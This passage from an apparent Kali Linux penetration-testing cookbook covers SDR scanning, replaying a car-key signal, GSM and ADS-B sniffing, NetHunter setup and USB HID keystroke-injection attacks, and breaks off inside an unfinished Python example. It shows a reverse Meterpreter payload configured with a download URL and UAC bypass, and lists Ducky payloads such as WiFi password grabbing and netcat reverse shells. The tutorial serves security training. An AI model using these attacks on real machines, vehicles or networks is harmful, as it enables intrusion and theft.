Using device 0: Generic RTL2832U OEM
Found Rafael Micro R820T tuner
Supported gain values (29): 0.0 0.9 1.4 2.7 3.7 7.7 8.7 12.5 14.4 15.7 16.6 19.7
20.7 22.9 25.4 28.0 29.7 32.8 33.8 36.4 37.2 38.6 40.2 42.1 43.4 43.9 44.5 48.0
49.6
Exact sample rate is: 1000000.026491 Hz
[R82XX] PLL not locked!
Sampling at 1000000 S/s.

Info: This tool will continuously read from the device, and report if
samples get lost. If you observe no further output, everything is fine.





4. Now, we are all set to move on to the next recipe and play around with our device. 


Hands-on with RTLSDR scanner 


RTLSDR scanner is a cross-platform GUI that can be used for spectrum analysis. It will scan the given 
frequency range and display the output in a spectrogram. 


How to do it... 


Here is the recipe to run rtlsdr-scanner:

1. We connect RTLSDR to the system and start the scanner using the command:

rtlsdr-scanner

The following screenshot shows the output of the preceding command:

root@kali:~# rtlsdr-scanner
RTLSDR Scanner
Found Rafael Micro R820T tuner
[R82XX] PLL not locked!
/usr/lib/python2.7/dist-packages/matplotlib/cbook.py:136: MatplotlibDeprecationWarning: The axisbg attribute was deprecated in version 2.0. Use facecolor instead.
  warnings.warn(message, mplDeprecation, stacklevel=1)
/usr/lib/python2.7/dist-packages/matplotlib/cbook.py:136: MatplotlibDeprecationWarning: idle event is only implemented for the wx backend, and will be removed in matplotlib 2.1. Use the animations module instead.
  warnings.warn(message, mplDeprecation, stacklevel=1)
05:52:24: Debug: ScreenToClient cannot work when toplevel window is not shown
05:52:24: Debug: ScreenToClient cannot work when toplevel window is not shown

(rtlsdr_scan.py:6254): Gdk-WARNING **: gdk_window_set_icon_list: icons too large





2. We should see a new window open, showing the GUI interface of the tool; here we can simply enter
the frequency range on which we want to perform the scan and click on Start scan:

[RTLSDR Scanner window: Range (MHz) Start 90, Stop 108; Gain (dB) 0.0; Mode Continuous; FFT size 1024; Status: GPS: Disabled]


3. It will take some time to see a sweep of frequencies, and then we will see the result in graphical
format:

[RTLSDR Scanner - Scan 87.0-108.0MHz: Frequency Spectrogram, 87 - 108 MHz, gain = 0.0dB; Range (MHz) Start 87, Stop 108; Gain 0.0 dB; Mode Single; Dwell 131 ms; FFT size 1024; Status: Finished]


If the application stops responding, it is recommended that you lower the range and choose
Single as the Mode instead of Continuous.


Playing around with gqrx 


The gqrx tool is an open source software-defined radio (SDR) receiver powered by GNU Radio and
the Qt graphical toolkit.

It has many features, such as:

• Discovering devices connected to a computer
• Processing I/Q data
• AM, SSB, CW, FM-N, and FM-W (mono and stereo) demodulators
• Recording and playing back audio to/from WAV file
• Recording and playing back raw baseband data
• Streaming audio output over UDP

In this recipe, we will cover the basics of gqrx and of another tool, rtl_sdr.


How to do it... 


Following is the recipe to use gqrx: 


1. We can install gqrx using the command:

apt install gqrx

2. Once it's done, we run the tool by typing gqrx.
3. We choose our device from the drop-down menu in the window that opens and click OK:

[Configure I/O devices dialog: I/Q input Device "Realtek RTL2838UHIDIR", Device string rtl=0, Input rate 1800000, Decimation None, Sample rate 1.800 Msps, Bandwidth 0.000000 MHz, LNB LO 0.000000 MHz; Audio output Device "Built-in Audio Analog Stereo", Sample rate 48 kHz]





4. Now the GQRX application opens, and on the right-hand side, in the receiver window, we choose the
frequency we want to view. Then we go to the File menu and click on Start DSP:

[File menu: Start DSP (Ctrl+D), I/O Devices, Load settings (Ctrl+L), Save settings (Ctrl+S), Save waterfall (Ctrl+W), Quit (Ctrl+Q)]





5. Now we see a waterfall and we should start hearing the sound in our speaker. We can even change
the frequency we are listening to using the up and down buttons in the Receiver Options window:

[Receiver Options: Hardware freq 935.000000 MHz, Frequency 934629.100 kHz, Filter width Normal, Filter shape Normal, Mode AM, AGC Medium, Squelch -150.0 dB, Noise blanker NB1/NB2; tabs Input controls, Receiver Options, FFT Settings, Audio]




6. We will look at an example of a car key remote, which is used to lock/unlock a car.
7. Once we press the button a couple of times, we will see the change in the waterfall showing the
difference in the signal:

[Waterfall around 443.001.000 MHz showing the bursts from the key remote]

8. We can record the signal in the record window and then save it. This can be later decoded and
transmitted back to the car using a transponder to unlock it.


9. To capture the data at 443 MHz, we can use the command:

rtl_sdr -f 443M - | xxd

The following screenshot shows the output of the preceding command:

root@kali:~# rtl_sdr -f 93.5M - | xxd
Found 1 device(s):
  0:  Realtek, RTL2838UHIDIR, SN: 00000001

Using device 0: Generic RTL2832U OEM
Found Rafael Micro R820T tuner
[R82XX] PLL not locked!
Sampling at 2048000 S/s.
Tuned to 93500000 Hz.
Tuner gain set to automatic.
Reading samples in async mode...
[hex dump of the raw I/Q samples follows]





There's more... 


To learn more about gqrx, visit these blogs:

• http://gqrx.dk/doc/practical-tricks-and-tips
• https://blog.compass-security.com/2016/09/software-defied-radio-sdr-and-decoding-on-off-keying-ook/


Kalibrating device for GSM tapping 


RTLSDR also allows us to view GSM traffic using a tool called kal, or kalibrate-rtl. This tool can scan for
GSM base stations in a frequency band. In this recipe, we will learn about using kalibrate and then
confirm the channel in gqrx.


How to do it... 


Following are the steps to use kalibrate: 


1. Most countries use the GSM900 band. In the USA, it's GSM850. We will use the following
command to scan for GSM base stations:

kal -s GSM900 -g 40

The following screenshot shows the output of the preceding command:

root@kali:~# kal -s GSM900 -g 40
Found 1 device(s):
  0:  Generic RTL2832U OEM

Using device 0: Generic RTL2832U OEM
Detached kernel driver
Found Rafael Micro R820T tuner
Exact sample rate is: 270833.002142 Hz
[R82XX] PLL not locked!
Setting gain: 40.0 dB

GSM-900:
[channel list, partly unreadable in the screenshot: chan: 53 (945.6MHz - .620kHz) and further channels at 941.8MHz, 947.2MHz and 947.6MHz, each with its offset and power]

3. We note the frequency; in our case, we will use 947.6 MHz along with the offset.


4. Now we open GQRX and enter it in the Receiver Options window:

[gqrx receiver: Hardware freq 947.605000 MHz, Frequency 947590.823 kHz, Filter width Wide, Filter shape Normal, Mode WFM (mono), AGC Medium, Squelch -150.0 dB, Noise blanker NB1/NB2]

5. We can see in the waterfall that the device is able to catch the signal perfectly:

[Waterfall and FFT plot at 947.605000 MHz, signal level around -42.1 dB]


6. Now we will look at this data at the packet level. We will use a tool known as gr-gsm.
7. It can be installed using apt install gr-gsm:

root@kali:~# apt install gr-gsm
Reading package lists... Done
Building dependency tree
Reading state information... Done
gr-gsm is already the newest version (0.41.2-1).
The following packages were automatically installed and are no longer required:
[long list of packages omitted]


8. Once it is done, if we type grgsm_ and press the Tab key, we will see a list of the different tools
available for us:

root@kali:~# grgsm_
grgsm_capture       grgsm_decode        grgsm_livemon_headless
grgsm_channelize    grgsm_livemon       grgsm_s
root@kali:~# grgsm_





9. First, we will use grgsm_livemon to monitor the GSM packets live. We'll open the terminal and type
grgsm_livemon:

[Gr-gsm Livemon window: PPM Offset 0.000, Gain 30.000, Frequency 941800000; plot of Relative Gain (dB) against Frequency (MHz), 941.000 to 942.500]

10. In the new window that opens, we will switch to the frequency we captured in the previous steps
using kalibrate:

[Gr-gsm Livemon window: PPM Offset 0.000, Gain 30.000, Frequency 947600000; plot of Relative Gain (dB), -20 to -80, against Frequency (MHz), 946.600 to 947.200]

11. We can zoom into a particular range by dragging and selecting the area on the graphical window.

12. In a new terminal window, we start Wireshark by typing wireshark.

13. We then set the capture interface to Loopback: lo and start our packet capture. We capture on loopback because gr-gsm does not hand Wireshark the raw bursts; it decodes them itself and sends each frame to 127.0.0.1 as a GSMTAP datagram (UDP port 4729), which Wireshark knows how to dissect:

[Screenshot: the Wireshark 1.12.6 start page, with the Interface List showing eth0, any, lo, nflog and nfqueue]
14. Next, we add the filter gsmtap:

Filter: gsmtap

No.  Time         Source     Destination  Protocol  Length  Info
410  6.559696000  127.0.0.1  127.0.0.1    GSMTAP    81      (CCCH) (RR) Paging Request Type 1
411  6.561027000  127.0.0.1  127.0.0.1    LAPDm     81      U, func=Unknown(DTAP) (SS)
412  6.563428000  127.0.0.1  127.0.0.1    (row partly unreadable in the screenshot; a Paging message)
413  6.563608000  127.0.0.1  127.0.0.1    LAPDm     81      U, func=Unknown(DTAP) (SS)
414  6.565694000  127.0.0.1  127.0.0.1    GSMTAP    81      (CCCH) (RR) Paging Request Type 1
415  6.565874000  127.0.0.1  127.0.0.1    LAPDm     81      U, func=Unknown(DTAP) (SS)
416  6.626651000  127.0.0.1  127.0.0.1    LAPDm     81      U, func=Unknown(DTAP) (SS)
417  6.629165000  127.0.0.1  127.0.0.1    GSMTAP    81      (CCCH) (RR) Paging Request Type 1
418  6.631228000  127.0.0.1  127.0.0.1    LAPDm     81      U, func=Unknown(DTAP) (SS)
419  6.632487000  127.0.0.1  127.0.0.1    GSMTAP    81      (CCCH) (RR) Paging Request Type 1
420  6.633865000  127.0.0.1  127.0.0.1    LAPDm     81      U, func=Unknown(DTAP) (SS)
421  6.688695000  127.0.0.1  127.0.0.1    GSMTAP    81      (CCCH) (RR) Paging Request Type 1
422  6.688854000  127.0.0.1  127.0.0.1    LAPDm     81      U, func=Unknown
423  6.692349000  127.0.0.1  127.0.0.1    GSMTAP    81      (CCCH) (RR) Paging Request Type 1
424  6.692515000  127.0.0.1  127.0.0.1    LAPDm     81      U, func=Unknown
425  6.695730000  127.0.0.1  127.0.0.1    LAPDm     81      U, func=Unknown
426  6.696818000  127.0.0.1  127.0.0.1    GSMTAP    81      (CCCH) (RR) Paging Request Type 1
427  6.697682000  127.0.0.1  127.0.0.1    LAPDm     81      U, func=Unknown
428  6.754927000  127.0.0.1  127.0.0.1    GSMTAP    81      (CCCH) (RR) Paging Request Type 1
429  6.760595000  127.0.0.1  127.0.0.1    LAPDm     81      U, func=Unknown(DTAP) (SS)

15. We should see the packets in the info window. We look for a packet labelled System Information Type 3 and open it:

[Screenshot: the packet list scrolled further down (frames 2121 to 2127), again alternating GSMTAP Paging Request Type 1 and LAPDm frames]

16. We will see the system information, such as the Mobile Country Code, Mobile Network Code, and Location Area Code:

GSM CCCH - System Information Type 3
    L2 Pseudo Length
    Protocol Discriminator: Radio Resources Management messages
    Message Type: System Information Type 3
    Cell Identity - CI (51661)
    Location Area Identification (LAI) - 404/10/617
        Mobile Country Code (MCC): India (Republic of) (404)
        Mobile Network Code (MNC): Bharti Airtel Ltd., Delhi (10)
        Location Area Code (LAC): 0x0269 (617)
    Control Channel Description
    Cell Options (BCCH)
    Cell Selection Parameters
    RACH Control Parameters
    SI 3 Rest Octets

17. With this recipe, we have seen how GSM traffic travels over the air and how the broadcast and common control channel messages (System Information, Paging Requests) can be captured and decoded. These messages are sent unencrypted by every base station, which is why they can be read without any key material; A5 ciphering only starts once a dedicated channel has been assigned to a subscriber.
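To see what Wireshark is actually dissecting here, the following added example (not code from the book or from gr-gsm) reads the same GSMTAP datagrams that grgsm_livemon sends to UDP port 4729 on loopback and pulls the MCC, MNC, LAC and Cell Identity out of a System Information Type 3. The datagram it decodes is constructed inline to match the capture above (ARFCN 63, that is 947.6 MHz, and LAI 404/10/617); the header layout is the osmocom GSMTAP v2 header and the SI3 layout is from 3GPP TS 44.018. Reading from a live grgsm_livemon is left to the sniff() function, which the example itself does not call.

```python
"""Decode the GSMTAP frames that grgsm_livemon sends to UDP 127.0.0.1:4729.

Added example, not part of the original recipe or of gr-gsm. SAMPLE_DATAGRAM
is constructed by hand to mirror the System Information Type 3 that Wireshark
displayed (MCC 404, MNC 10, LAC 617, CI 51661).
"""
import socket
import struct

GSMTAP_PORT = 4729                 # default port gr-gsm and Wireshark agree on
GSMTAP_TYPE_UM = 0x01              # GSM air interface (Um)
GSMTAP_CHANNEL_BCCH = 0x01         # broadcast control channel
RR_PROTOCOL_DISCRIMINATOR = 0x06   # Radio Resource management
RR_SYSTEM_INFORMATION_TYPE_3 = 0x1B


def parse_gsmtap_header(datagram):
    """Split a datagram into its GSMTAP v2 header fields and the L3 payload."""
    (version, hdr_len_words, msg_type, timeslot, arfcn_raw, signal_dbm,
     snr_db, frame_number, sub_type, antenna, sub_slot) = struct.unpack(
        "!BBBBHbbIBBBx", datagram[:16])
    if version != 2:
        raise ValueError("unsupported GSMTAP version %d" % version)
    header = {
        "type": msg_type,
        "timeslot": timeslot,
        "arfcn": arfcn_raw & 0x3FFF,        # bit 14 = uplink flag, bit 15 = PCS band
        "uplink": bool(arfcn_raw & 0x4000),
        "signal_dbm": signal_dbm,
        "snr_db": snr_db,
        "frame_number": frame_number,
        "sub_type": sub_type,
    }
    return header, datagram[hdr_len_words * 4:]


def decode_lai(lai):
    """Unpack the 5-byte Location Area Identification (BCD MCC/MNC + 16-bit LAC)."""
    b0, b1, b2, lac_hi, lac_lo = lai
    mcc = (b0 & 0x0F) * 100 + (b0 >> 4) * 10 + (b1 & 0x0F)
    mnc = (b2 & 0x0F) * 10 + (b2 >> 4)
    if (b1 >> 4) != 0x0F:                   # third MNC digit present (3-digit MNC)
        mnc = mnc * 10 + (b1 >> 4)
    return mcc, mnc, (lac_hi << 8) | lac_lo


def decode_si3(l3):
    """Return cell identity and LAI from a System Information Type 3, else None."""
    if len(l3) < 10:
        return None
    # byte 0 is the L2 pseudo length, byte 1 carries the protocol discriminator
    if (l3[1] & 0x0F) != RR_PROTOCOL_DISCRIMINATOR or l3[2] != RR_SYSTEM_INFORMATION_TYPE_3:
        return None
    mcc, mnc, lac = decode_lai(l3[5:10])
    return {"ci": int.from_bytes(l3[3:5], "big"), "mcc": mcc, "mnc": mnc, "lac": lac}


def arfcn_to_downlink_mhz(arfcn):
    """Downlink centre frequency for P-GSM 900, E-GSM 900 and DCS 1800 ARFCNs."""
    if 0 <= arfcn <= 124:
        return (9350 + 2 * arfcn) / 10
    if 975 <= arfcn <= 1023:
        return (9350 + 2 * (arfcn - 1024)) / 10
    if 512 <= arfcn <= 885:
        return (18052 + 2 * (arfcn - 512)) / 10
    raise ValueError("ARFCN %d is outside the bands handled here" % arfcn)


def decode_datagram(datagram):
    """Header fields plus the SI3 content when the payload is an SI3 on the BCCH."""
    header, l3 = parse_gsmtap_header(datagram)
    header["downlink_mhz"] = arfcn_to_downlink_mhz(header["arfcn"])
    header["si3"] = decode_si3(l3) if header["sub_type"] == GSMTAP_CHANNEL_BCCH else None
    return header


# Constructed datagram: GSMTAP header for ARFCN 63 (947.6 MHz) on the BCCH, then an
# SI3 with CI 0xC9CD (51661) and LAI 404/10/617; the remaining IEs are filler bytes.
SAMPLE_DATAGRAM = (
    struct.pack("!BBBBHbbIBBBx", 2, 4, GSMTAP_TYPE_UM, 0, 63, -60, 20, 123456,
                GSMTAP_CHANNEL_BCCH, 0, 0)
    + bytes.fromhex("49061bc9cd04f4010269") + bytes([0x2B]) * 13
)


def sniff(count=1, port=GSMTAP_PORT):
    """Read live frames from grgsm_livemon (start it first; not used by the test)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("127.0.0.1", port))
    results = []
    while len(results) < count:
        data, _ = sock.recvfrom(4096)
        results.append(decode_datagram(data))
    sock.close()
    return results


if __name__ == "__main__":
    print(decode_datagram(SAMPLE_DATAGRAM))
```

With grgsm_livemon running, sniff(5) returns the first five decoded frames; only frames carrying the BCCH sub_type are tried as SI3, and everything else comes back with si3 set to None. arfcn_to_downlink_mhz() is the arithmetic kalibrate does in reverse, which makes it easy to confirm that the channel you tuned is the one the frames report.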


There's more... 


Here are some great videos to give you a better understanding of GSM sniffing: 


https://www.crazydanishhacker.com/category/gsm-sniffing-hacking/


Decoding ADS-B messages with Dump1090 


ADS-B stands for Automatic Dependent Surveillance-Broadcast. It is a system in which electronic 
equipment onboard an aircraft automatically broadcasts the precise location of the aircraft via a digital 
data link. 


As described in the official readme of the tool, Dump1090 is a Mode S decoder specifically designed for RTL-SDR devices.

The main features are:

Robust decoding of weak messages. With dump1090, many users observed improved range compared to other popular decoders.

Network support: TCP port 30003 stream (MSG format), raw packets, and HTTP.

Embedded HTTP server that displays the currently detected aircraft on Google Maps.

Single-bit error correction using the 24-bit CRC.

Ability to decode DF11 and DF17 messages.

Ability to decode DF formats such as DF0, DF4, DF5, DF16, DF20, and DF21, where the checksum is XOR-ed with the ICAO address, by brute-forcing the checksum field with recently seen ICAO addresses.

Decoding of raw IQ samples from a file (using the --ifile command-line switch).

Interactive CLI mode where the aircraft currently detected are shown as a list, refreshing as more data arrives.

CPR coordinate decoding and track calculation from velocity.

TCP server streaming and receiving raw data to/from connected clients (using --net).

In this recipe, we will use the tool to look at air traffic with visuals.


How to do it... 


Following are the steps to use Dump1090: 


1. We can download the tool from the Git repo using the command git clone https://github.com/antirez/dump1090.git:

root@kali:~# git clone https://github.com/antirez/dump1090.git
Cloning into 'dump1090'...
remote: Counting objects: 265, done.
remote: Total 265 (delta 0), reused 0 (delta 0), pack-reused 265
Receiving objects: 100% (265/265), 536.32 KiB | 266.00 KiB/s, done.
Resolving deltas: 100% (147/147), done.
root@kali:~#





2. Once downloaded, we go to the folder and run make (the build needs librtlsdr and its headers, which the librtlsdr-dev package provides on Kali).
3. We should now have an executable. We can run the tool using the following command:

| ./dump1090 --interactive --net

The following screenshot shows the output of the preceding command:

[Screenshot: the dump1090 interactive table, with columns for the ICAO hex code, flight, altitude, speed, latitude and longitude, showing a contact at 28.447, 77.071]

4. In a few minutes, we should see the flights, and by opening the browser at http://localhost:8080, we will be able to see the flights on the map as well.
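To make the CRC and DF17 bullets above concrete, here is an added example (not part of the book or of dump1090) that checks and decodes the raw frames dump1090 --net serves on TCP port 30002, one "*<hex>;" line per frame. The sample frames are constructed test input: the first is a public DF17 aircraft-identification frame, the second is the same frame with one bit flipped so the parity check rejects it.

```python
"""Check and decode the raw Mode S frames that dump1090 --net serves on TCP port 30002.

Added example; it is not part of the original recipe or of dump1090. The
frames in SAMPLE_LINES are constructed test input.
"""
GENERATOR = 0x1FFF409   # Mode S CRC polynomial, 25 bits (x^24 + ... + 1)
# 6-bit character set used in the aircraft identification message (TC 1-4)
CALLSIGN_CHARS = "#ABCDEFGHIJKLMNOPQRSTUVWXYZ#####_###############0123456789######"


def mode_s_crc(msg):
    """Polynomial remainder over the whole frame; 0 means the parity field checks out.

    For DF17 the last 24 bits are the CRC of the first 88, so a clean frame
    divides exactly. A one-bit error leaves a non-zero remainder; dump1090's
    single-bit correction simply tries every flip until this returns zero.
    """
    data = int.from_bytes(msg, "big")
    nbits = len(msg) * 8
    for shift in range(nbits - 25, -1, -1):
        if (data >> (shift + 24)) & 1:
            data ^= GENERATOR << shift
    return data & 0xFFFFFF


def parse_raw_line(line):
    """Turn one '*<hex>;' line from port 30002 into bytes (None if malformed)."""
    line = line.strip()
    if not (line.startswith("*") and line.endswith(";")):
        return None
    try:
        return bytes.fromhex(line[1:-1])
    except ValueError:
        return None


def decode_frame(msg):
    """Downlink format, ICAO address, parity result and callsign (when TC 1-4)."""
    df = msg[0] >> 3
    result = {"df": df, "icao": msg[1:4].hex().upper(),
              "crc_ok": mode_s_crc(msg) == 0, "callsign": None}
    if df == 17 and len(msg) == 14:
        me = msg[4:11]                      # 56-bit extended squitter payload
        type_code = me[0] >> 3
        result["type_code"] = type_code
        if 1 <= type_code <= 4:             # aircraft identification message
            bits = int.from_bytes(me[1:7], "big")
            result["callsign"] = "".join(
                CALLSIGN_CHARS[(bits >> (42 - 6 * i)) & 0x3F] for i in range(8))
    return result


def decode_feed(lines):
    """Decode raw lines and keep only the frames whose parity is intact."""
    frames = []
    for line in lines:
        msg = parse_raw_line(line)
        if msg is None:
            continue
        frame = decode_frame(msg)
        if frame["crc_ok"]:
            frames.append(frame)
    return frames


# Constructed feed: a public sample DF17 frame, a copy with its last bit flipped, and junk.
SAMPLE_LINES = [
    "*8d406b902015a678d4d220aa4bda;",
    "*8d406b902015a678d4d220aa4bdb;",   # one-bit error: must fail the CRC
    "not a frame",
]

if __name__ == "__main__":
    for frame in decode_feed(SAMPLE_LINES):
        print(frame)
```

Pipe the output of nc localhost 30002 into decode_feed() for live data. Note what the CRC does and does not give you: it detects corruption on the radio link, but Mode S and ADS-B carry no authentication, so a frame that passes the check could have been transmitted by anyone with an SDR. Treat the feed as untrusted input, which is also why parse_raw_line() refuses anything that is not well-formed hex.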


There's more... 


More about this can be learned from https://www.rtl-sdr.com/adsb-aircraft-radar-with-rtl-sdr/. 


Kali in Your Pocket — NetHunters and Raspberries


In this chapter, we will cover the following recipes: 


Installing Kali on Raspberry Pi 
Installing NetHunter 

Superman typing — HID attacks 
Can I charge my phone? 

Setting up an evil access point 


Introduction 


In some cases, while doing a pentest, a client may ask us to do a proper red team engagement. In such cases, walking into an office with a laptop in hand may look suspicious, which is where this chapter comes in handy. We can perform red teaming with a small device such as a cell phone or a Raspberry Pi and carry out the pentest effectively with it. In this chapter, we will talk about setting up Kali Linux on a Raspberry Pi and on compatible cell phones, and using it to perform some cool attacks on the network.


Installing Kali on Raspberry Pi 


Raspberry Pi is an affordable ARM computer. It is extremely small, which makes it portable and therefore well suited to running Kali Linux for pentesting from a pocket-sized device.


In this recipe, you will learn about installing a Kali Linux image on a Raspberry Pi. 


Getting ready 


Raspberry Pi boots from an SD card. The best way to set up Kali on a Raspberry Pi is to write a bootable Kali image to an SD card and insert it into the Pi.


How to do it... 


To install Kali on Raspberry Pi follow the given steps: 


1. We will first download the image from Offensive Security's website at https://www.offensive-security.com/kali-linux-arm-images/:

[Screenshot: the RaspberryPi Foundation section of the ARM images page]

Image Name        Size   Version   SHA256Sum
RaspberryPi ...   0.8G   2017.1    4976C446802EE16252954453DC577E2001698492E52DDE47B27B8548C01BA686
RaspberryPi ...   0.8G   2017.1    08B71BCC38615422B57C62AD003FC37E67278A9172C79B7AE7C8B7DCEC684E98
RaspberryPi ...   0.8G   2017.1    8E121F87AE65491C3077172DB65FE2CDB7379BA472810BB338461A947A99AD46

2. Once the image is downloaded, we check its SHA256 sum against the one listed on the page (sha256sum on Linux/macOS) before writing it; a corrupted or tampered image is much cheaper to catch here than after it is on the network. The ARM images are distributed compressed (.img.xz), so decompress first. There are different ways to write the image to our memory card.
3. On Linux/macOS, it can be done using the dd utility, with the following command:

| dd if=/path/to/kali-2.1.2-rpi.img of=/dev/sdcard/path bs=512k

Here of= must point at the whole SD card device (for example /dev/sdb or /dev/mmcblk0, not a partition such as /dev/sdb1); dd overwrites whatever device it is given without asking, so confirm the device name with lsblk first.

4. Once this process completes, we can plug the SD card into the Pi and power it on.
5. We will see our Kali boot up.

We can refer to this link for a more detailed guide: https://docs.kali.org/downloading/kali-linux-live-usb-install.


Installing NetHunter 


As described by Offensive Security's official wiki: 


"The Kali NetHunter is an Android ROM overlay that includes a robust Mobile Penetration Testing 
Platform. The overlay includes a custom kernel, a Kali Linux chroot, and an accompanying Android 
application, which allows for easier interaction with various security tools and attacks. Beyond the 
penetration testing tools arsenal within Kali Linux, NetHunter also supports several additional 
classes, such as HID Keyboard Attacks, BadUSB attacks, Evil AP MANA attacks, and much more. 
For more information about the moving parts that make up NetHunter, check out our NetHunter 
Components page. NetHunter is an open source project developed by Offensive Security and the 
community." 


In this recipe, you will learn how to install and configure NetHunter on an Android device and perform 
attacks using it. We can find a list of supported hardware at https://github.com/offensive-security/kali-NetHunter/wiki. 


Getting ready 


Before we start, we need the device to be rooted, with Team Win Recovery Project (TWRP) installed as the custom recovery.


How to do it... 


To install NetHunter follow the given steps: 


1. We download the NetHunter ZIP file, copy it to the SD card, and then reboot the phone into recovery mode. We are using a OnePlus One with CyanogenMod 12.1. Recovery mode can be booted by pressing the power and volume down buttons simultaneously.

2. Once it is in recovery mode, we choose Install on the screen and select the ZIP file. We can download the ZIP from https://www.offensive-security.com/kali-linux-NetHunter-download:

[Screenshot: the Kali Linux NetHunter Downloads page, Current NetHunter Release v3.0, with images for the Nexus 4 & 5, Nexus 7 and Nexus 10]


3. When it's done, we reboot the phone and we should see NetHunter in our application menu.

4. But before we start, we need to install BusyBox on the phone from the Play Store:

[Screenshot: the Play Store listing for BusyBox by Stephen (Stericson), with its INSTALL button]

5. Once this is done, we run the app and click on Install:

[Screenshot: the BusyBox app reporting "BusyBox v1.27.1-Stericson is installed" to /system/xbin/, with Install Busybox, Smart Install and Uninstall options]


6. Next, we open NetHunter, and from the menu, we choose Kali Chroot Manager:

[Screenshot: the NetHunter app (version 3.15, built 2016-09-04) with its menu: Home, Kali Chroot Manager, Check App Update, Kali Services, Custom Commands, MAC Changer, VNC Manager]

7. We click on ADD METAPACKAGES and we will be all set for the next recipe:

[Screenshot: Kali Chroot Manager. The chroot is described as a full installation of Kali Linux that shares processing, networking, storage and other resources with Android; it resides in the app's internal storage and requires about 400 MB for the minimal core installation. Buttons: ADD METAPACKAGES, REMOVE CHROOT]

Superman typing — HID attacks 


NetHunter has a feature that lets our device, connected to a PC over a USB OTG cable, present itself as a keyboard and type any given commands on the connected PC. This allows us to perform HID attacks.


"HID (human interface device) attack vector is a remarkable combination of customized hardware and 
restriction bypass via keyboard emulation. So, when we insert the device, it will be detected as a 
keyboard, and using the microprocessor and onboard flash memory storage, you can send a very fast 
set of keystrokes to the target's machine and completely compromise it." 

— https://www.safaribooksonline.com/library/view/metasploit/9781593272883/ 


How to do it... 


To perform HID attacks follow the given steps: 


1. We can perform them by opening the NetHunter app.
2. In the menu, we choose HID Attacks:

[Screenshot: the NetHunter menu (version 3.15), with HID Attacks selected]

3. The HID Attacks screen opens on the PowerSploit tab, which offers a choice of reverse Meterpreter HTTP/S payloads; the URL to payload must be reachable from the victim machine, since that is where the larger payload is downloaded from. We fill in LHOST, LPORT, the payload and the URL, and click UPDATE:

[Screenshot: the PowerSploit tab, with IP Address (LHOST) 192.168.1.17, Port (LPORT) 4444, Payload windows/meterpreter/reverse_https, URL to payload https://138.68.17.41:8443/, and an UPDATE button]

4. Let's try the Windows CMD tab instead; in the Edit source box, we type the command we want executed. The list menu also lets us choose the keyboard layout and a UAC Bypass option that makes the command run as administrator on different versions of Windows. Because the device types blindly, the keyboard layout we pick must match the one configured on the target, or the symbols in the command will come out wrong:

[Screenshot: the Windows CMD tab. "This Windows CMD payload allows you to enter raw commands to a Windows command prompt. Hitting the list menu will allow you to choose keyboard layout or UAC bypass options." Edit source: echo "hello world"]

5. We choose Windows 10 from the UAC Bypass menu and then we type a simple command:

echo "hello world"

[Screenshot: the UAC Bypass options: No UAC Bypass, an option unreadable in the screenshot, Windows 8, Windows 10 (selected)]

6. Then, we connect our phone to a Windows 10 device and select Execute Attack from the menu:

[Screenshot: the HID Attack menu: Keyboard Layout, UAC Bypass, Execute Attack, Reset USB, and LOAD FROM SDCARD / SAVE TO SDCARD buttons]

7. We will see the command being executed:

[Screenshot: a C:\WINDOWS\system32\cmd.exe window showing "hello world"]

For more information, visit https://github.com/offensive-security/kali-NetHunter/wiki/NetHunter-HID-Attacks.


Can I charge my phone? 


In this recipe, we will look at a different type of HID attack, known as DuckHunter HID. This allows us to convert the well-known USB Rubber Ducky scripts (Ducky Script) into NetHunter HID attacks.


How to do it... 


To perform DuckHunter HID attacks follow the given steps: 


1. We can perform them by opening the NetHunter app.
2. In the menu, we choose DuckHunter HID.
3. The Convert tab is where we can type or load our scripts for execution:

[Screenshot: DuckHunter HID, Convert tab. "The DuckHunter script can easily convert USB Rubber Ducky scripts into NetHunter HID format. You can generate preconfigured scripts at the incredibly useful Ducky Toolkit site, or check out the Rubber Ducky script syntax from the official ..." Example presets / Select preset / Preview:]

REM This is a comment
STRING Hello world!
STRING Example of typing to computer. Nethunter is awesome!
REM To sleep for five seconds use
SLEEP 5000
STRING I slept for 5 seconds, now I'm awake!
STRING abcdefghijklmnopqrstuvwxyz
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZ
STRING 1234567890-=!@#$%^&*()_+
STRING []\;',./{}|:"<>?`~
MOUSE 300 300

4. Let's start by using the simple Hello world! script.
5. We open a text editor on any device, then we connect our device and click on the play button.
6. We will see that the text is automatically typed into the editor:

Hello world!
Example of typing to computer. Nethunter is awesome!
I slept for 5 seconds, now I'm awake!
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
1234567890-=!@#$%^&*()_+
[]


7. There are multiple scripts available on the internet that can be used to perform various attacks using NetHunter:

Payload — Hello World
Payload — WiFi password grabber
Payload — Basic Terminal Commands Ubuntu
Payload — Information Gathering Ubuntu
Payload — Hide CMD Window
Payload — Netcat-FTP-download-and-reverse-shell
Payload — Wallpaper Prank
Payload — YOU GOT QUACKED!
Payload — Reverse Shell
Payload — Fork Bomb
Payload — Utilman Exploit
Payload — WiFi Backdoor
Payload — Non-Malicious Auto Defacer
Payload — Lock Your Computer Message
Payload — Ducky Downloader
Payload — Ducky Phisher
Payload — FTP Download / Upload
Payload — Restart Prank
Payload — Silly Mouse, Windows is for Kids
Payload — Windows Screen rotation hack
Payload — Powershell Wget + Execute

8. These can be downloaded, loaded into NetHunter and then used against a target PC; the list can be found at https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads. Most of these payloads assume a US keyboard layout and the timing of a real Ducky, so on a phone you may need to adjust the DELAY values and pick the matching layout in NetHunter before they run reliably.

More information can be found at https://github.com/hak5darren/USB-Rubber-Ducky/wiki.
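Both the HID Attacks recipe and the DuckHunter recipe above come down to the same mechanism: the phone's USB gadget reports itself as a keyboard and writes 8-byte boot-protocol keyboard reports to the kernel's HID gadget device. The following added example (not NetHunter's or Hak5's own code) compiles a small subset of Ducky Script (REM, STRING, DELAY/SLEEP, ENTER and the other named keys, and GUI/CTRL/ALT/SHIFT plus one key) into that sequence of reports for a US keyboard layout. The device path /dev/hidg0 and the sample script are assumptions; the test only exercises the compiler, never the device.

```python
"""Translate a Ducky Script into the USB HID keyboard reports an OTG gadget sends.

Added example, not NetHunter's or Hak5's code. The gadget device path is an
assumption (/dev/hidg0); key codes follow the USB HID Usage Tables, US layout.
"""
import time

MOD_LCTRL, MOD_LSHIFT, MOD_LALT, MOD_LGUI = 0x01, 0x02, 0x04, 0x08
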